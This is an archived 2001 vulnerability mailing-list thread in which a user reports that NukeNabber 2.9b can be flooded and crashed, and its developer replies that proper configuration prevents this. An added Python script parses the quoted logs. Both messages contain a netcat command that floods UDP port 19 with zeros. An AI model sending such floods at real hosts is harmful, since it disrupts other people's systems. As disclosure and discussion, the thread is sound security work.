Vulnerability Development mailing list archives

Re: Bugs in NukeNabber 2.9b


From: "Daniel S. Otis-Vigil" <puppet () DYNAMSOL COM>
Date: Sun, 11 Feb 2001 23:35:58 -0700

First I would like to say it would have been nice if the author of this
"bug" report had contacted me so I could tell him how to properly configure
NukeNabber.

You must set the option to "ignore" or close a port or you can flood the
display.
As you can see below, when set up properly it works fine and cannot be
flooded.

tray# nc -u -v -v 207.188.145.193 19 < /dev/zero
toast.dynamsol.com [207.188.145.193] 19 (chargen) open
 sent 84738048, rcvd 0

[02/11/2001 23:32:42.921 GMT-0700] Unable to determine source of connection
on port 19 (udp).
[02/11/2001 23:32:43.131 GMT-0700] Unable to determine source of connection
on port 19 (udp).
[02/11/2001 23:32:43.171 GMT-0700] Unable to determine source of connection
on port 19 (udp).
[02/11/2001 23:32:43.221 GMT-0700] UDP from address tray.dynamsol.com
(207.188.145.195) remote port 32272 local port 19.
[02/11/2001 23:32:43.311 GMT-0700] Port 19 (udp) is now disabled for 60
seconds.

Daniel

-----Original Message-----
From: VULN-DEV List [mailto:VULN-DEV () SECURITYFOCUS COM]On Behalf Of
s1gnal_9
Sent: Sunday, February 11, 2001 9:55 PM
To: VULN-DEV () SECURITYFOCUS COM
Subject: Bugs in NukeNabber 2.9b


By default NukeNabber listens on port 19 (udp) for connections, and gathers
information on the source address...

If we send binary zeros to it, this is what we get:

*sends binary zeros*
nc <target> 19 -u < /dev/zero

*this appears on NukeNabber*
[02/11/2001 23:53:14.310 GMT-0500] Unable to determine source of connection
on port 19 (udp).
[02/11/2001 23:53:14.310 GMT-0500]
[02/11/2001 23:59:15.830 GMT-0500] Unable to determine source of connection
on port 19 (udp).
[02/11/2001 23:59:15.830 GMT-0500]
[02/11/2001 23:59:16.220 GMT-0500] Unable to determine source of connection
on port 19 (udp).
[02/11/2001 23:59:16.220 GMT-0500]
[02/11/2001 23:59:16.600 GMT-0500] Unable to determine source of connection
on port 19 (udp).
[02/11/2001 23:59:16.600 GMT-0500]


As we can see, it cannot see where the data is coming from... In the past I
have done tests and sent large amounts of data to this udp port and caused
NukeNabber to crash and sometimes lock up the system.



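Added example (not part of either message, and not NukeNabber's own code): a small Python parser for the log format shown in the two excerpts above, reporting per port how many unattributed hits were logged and how long it took until the port was disabled. The function and variable names are assumptions, and the second sample is abridged to the first two entries of the original report's log.

```python
import re
from datetime import datetime

FMT = "%m/%d/%Y %H:%M:%S.%f GMT%z"
ENTRY = re.compile(r"^\[(\d\d/\d\d/\d{4} [\d:.]+ GMT[+-]\d{4})\]\s*(.*)$")
HIT = re.compile(r"Unable to determine source of connection on port (\d+) \((\w+)\)")
OFF = re.compile(r"Port (\d+) \((\w+)\) is now disabled for (\d+) seconds")

# Log excerpts copied from the two messages, wrapping included (DEFAULT abridged).
CONFIGURED = """\
[02/11/2001 23:32:42.921 GMT-0700] Unable to determine source of connection
on port 19 (udp).
[02/11/2001 23:32:43.131 GMT-0700] Unable to determine source of connection
on port 19 (udp).
[02/11/2001 23:32:43.171 GMT-0700] Unable to determine source of connection
on port 19 (udp).
[02/11/2001 23:32:43.221 GMT-0700] UDP from address tray.dynamsol.com
(207.188.145.195) remote port 32272 local port 19.
[02/11/2001 23:32:43.311 GMT-0700] Port 19 (udp) is now disabled for 60
seconds.
"""
DEFAULT = """\
[02/11/2001 23:53:14.310 GMT-0500] Unable to determine source of connection
on port 19 (udp).
[02/11/2001 23:53:14.310 GMT-0500]
[02/11/2001 23:59:15.830 GMT-0500] Unable to determine source of connection
on port 19 (udp).
[02/11/2001 23:59:15.830 GMT-0500]
"""

def parse(text):
    """Yield (timestamp, message), rejoining entries wrapped across lines."""
    for line in re.sub(r"\n(?!\[)", " ", text.strip()).splitlines():
        m = ENTRY.match(line)
        if m:
            yield datetime.strptime(m.group(1), FMT), m.group(2).strip()

def summarize(text):
    """Return ({(port, proto): stats}, count of timestamp-only entries)."""
    ports, blanks = {}, 0
    for ts, msg in parse(text):
        blanks += not msg  # empty entries, as seen in the default-config log
        if m := HIT.search(msg) or OFF.search(msg):
            s = ports.setdefault((int(m.group(1)), m.group(2)),
                                 {"hits": 0, "first": ts, "disabled_after": None})
            if m.re is HIT:
                s["hits"] += 1
            elif s["disabled_after"] is None:
                s["disabled_after"] = (ts - s["first"]).total_seconds()
    return ports, blanks
```

A `disabled_after` of `None` means the log never recorded the port being disabled, which is the condition the first message describes as leaving the display open to flooding.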